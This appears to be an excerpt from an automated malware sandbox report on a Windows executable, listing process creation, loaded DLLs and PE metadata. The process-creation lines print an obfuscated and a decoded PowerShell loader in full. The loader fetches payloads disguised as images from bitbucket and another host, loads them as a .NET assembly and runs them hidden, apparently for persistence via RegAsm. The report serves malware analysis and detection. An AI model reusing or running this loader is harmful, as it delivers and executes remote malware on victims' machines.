@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeProcess created: C:\Windows\System32\cmd.exe cmd /c lol.vbsJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeSection loaded: feclient.dllJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeSection loaded: advpack.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: 00wVZ1NU5b.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: 00wVZ1NU5b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: 00wVZ1NU5b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: 00wVZ1NU5b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: 00wVZ1NU5b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: 00wVZ1NU5b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: 00wVZ1NU5b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: 00wVZ1NU5b.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: 00wVZ1NU5b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: wextract.pdb source: 00wVZ1NU5b.exe
        Source: Binary string: wextract.pdbGCTL source: 00wVZ1NU5b.exe
        Source: Binary string: corlib.pdbpdblib.pdbf"fh* source: powershell.exe, 00000007.00000002.2174893895.00000218A908A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: CallSite.Target.pdbp source: powershell.exe, 00000007.00000002.2200132855.00000218C30AB000.00000004.00000020.00020000.00000000.sdmp
